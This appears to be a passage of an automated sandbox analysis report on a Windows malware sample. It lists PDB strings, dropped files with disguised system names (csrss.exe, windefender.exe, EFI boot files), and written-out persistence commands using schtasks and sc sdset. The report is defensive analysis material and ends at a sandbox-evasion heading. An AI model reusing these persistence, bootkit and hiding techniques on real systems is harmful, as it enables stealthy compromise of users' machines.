          Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7x64\x64\Release\SSDTHook.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\Release\WinmonProcessMonitor.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: Unable to locate the .pdb file in this location source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: The module signature does not match with .pdb signature. source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: .pdb.dbg source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: '(EfiGuardDxe.pdbx source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000020.00000002.722682252.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: symsrv.pdbGCTL source: jkDmft1Qoe.exe, 00000000.00000002.668856780.0000000000C57000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665347802.0000000000C57000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.676233642.0000000000C57000.00000008.00020000.sdmp, csrss.exe, 00000011.00000002.701096602.0000000000C57000.00000008.00020000.sdmp, csrss.exe, 00000016.00000002.702361556.0000000000C57000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.697442468.0000000000C57000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.707266801.0000000000C57000.00000008.00020000.sdmp
          Source: Binary string: or you do not have access permission to the .pdb location. source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: EfiGuardDxe.pdb source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000020.00000002.722682252.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7,10x32\Release\win7x32.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: dbghelp.pdb source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win10x64\x64\Release\SSDTHook.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: dbghelp.pdbGCTL source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: C:\Windows\rss\csrss.exeCode function: 17_2_118B6686 push ss; retn 001Dh17_2_118B6687
          Source: jkDmft1Qoe.exeStatic PE information: section name: .symtab
          Source: csrss.exe.4.drStatic PE information: section name: .symtab
          Source: windefender.exe.10.drStatic PE information: section name: UPX2
          Source: injector.exe.10.drStatic PE information: section name: _RDATA
          Source: EfiGuardDxe.efi.10.drStatic PE information: section name: .xdata
          Source: NtQuerySystemInformationHook.dll.10.drStatic PE information: section name: _RDATA
          Source: bootx64.efi.10.drStatic PE information: section name: .xdata
          Source: bootmgfw.efi.10.drStatic PE information: section name: .xdata
          Source: jkDmft1Qoe.exeStatic PE information: real checksum: 0x0 should be: 0x8b176f
          Source: EfiGuardDxe.efi.10.drStatic PE information: real checksum: 0x4a5a6 should be: 0x51a75
          Source: bootx64.efi.10.drStatic PE information: real checksum: 0x2199 should be: 0x4c78
          Source: bootmgfw.efi.10.drStatic PE information: real checksum: 0x2199 should be: 0x4c78
          Source: csrss.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x8b176f
          Source: injector.exe.10.drStatic PE information: real checksum: 0x0 should be: 0x54ea2
          Source: windefender.exe.10.drStatic PE information: real checksum: 0x0 should be: 0x20ae45
          Source: NtQuerySystemInformationHook.dll.10.drStatic PE information: real checksum: 0x0 should be: 0x2279d
          Source: initial sampleStatic PE information: section name: UPX0
          Source: initial sampleStatic PE information: section name: UPX1

          Persistence and Installation Behavior:

          barindex
          Creates files in the system32 config directoryShow sources
          Source: C:\Windows\System32\netsh.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\PeerDistRepubJump to behavior
          Drops executables to the windows directory (C:\Windows) and starts themShow sources
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeExecutable created and started: C:\Windows\rss\csrss.exeJump to behavior
          Source: unknownExecutable created and started: C:\Windows\windefender.exe
          Drops PE files with benign system namesShow sources
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeFile created: C:\Windows\rss\csrss.exeJump to dropped file
          Source: C:\Windows\rss\csrss.exeFile created: C:\EFI\Boot\EfiGuardDxe.efiJump to dropped file
          Source: C:\Windows\rss\csrss.exeFile created: C:\EFI\Boot\bootx64.efiJump to dropped file
          Source: C:\Windows\rss\csrss.exeFile created: C:\EFI\Microsoft\Boot\bootmgfw.efiJump to dropped file
          Source: C:\Windows\rss\csrss.exeFile created: B:\EFI\Boot\old.efi (copy)Jump to dropped file
          Source: C:\Windows\rss\csrss.exeFile created: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dllJump to dropped file
          Source: C:\Windows\rss\csrss.exeFile created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeJump to dropped file
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeFile created: C:\Windows\rss\csrss.exeJump to dropped file
          Source: C:\Windows\rss\csrss.exeFile created: C:\EFI\Boot\EfiGuardDxe.efiJump to dropped file
          Source: C:\Windows\rss\csrss.exeFile created: C:\EFI\Boot\bootx64.efiJump to dropped file
          Source: C:\Windows\rss\csrss.exeFile created: C:\Windows\windefender.exeJump to dropped file
          Source: C:\Windows\rss\csrss.exeFile created: C:\EFI\Microsoft\Boot\bootmgfw.efiJump to dropped file
          Source: C:\Windows\rss\csrss.exeFile created: B:\EFI\Microsoft\Boot\fw.efi (copy)Jump to dropped file
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeFile created: C:\Windows\rss\csrss.exeJump to dropped file
          Source: C:\Windows\rss\csrss.exeFile created: C:\Windows\windefender.exeJump to dropped file

          Boot Survival:

          barindex
          Creates an autostart registry key pointing to binary in C:\WindowsShow sources
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SilentDustJump to behavior
          Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
          Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR 'C:\Windows\rss\csrss.exe' /TN csrss /F
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SilentDustJump to behavior
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SilentDustJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

          Hooking and other Techniques for Hiding and Protection:

          barindex
          May modify the system service descriptor table (often done to hook functions)Show sources
          Source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmpBinary or memory string: KeServiceDescriptorTable
          Source: jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmpBinary or memory string: KeServiceDescriptorTable
          Source: csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmpBinary or memory string: KeServiceDescriptorTable
          Source: csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmpBinary or memory string: KeServiceDescriptorTable
          Source: csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmpBinary or memory string: KeServiceDescriptorTable
          Source: csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmpBinary or memory string: KeServiceDescriptorTable
          Source: csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmpBinary or memory string: KeServiceDescriptorTable
          Source: csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmpBinary or memory string: KeServiceDescriptorTable
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\rss\csrss.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\rss\csrss.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\rss\csrss.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\rss\csrss.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\rss\csrss.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\rss\csrss.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\rss\csrss.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\rss\csrss.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\rss\csrss.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\rss\csrss.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\rss\csrss.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\rss\csrss.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\rss\csrss.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\rss\csrss.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\windefender.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\windefender.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\windefender.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\windefender.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
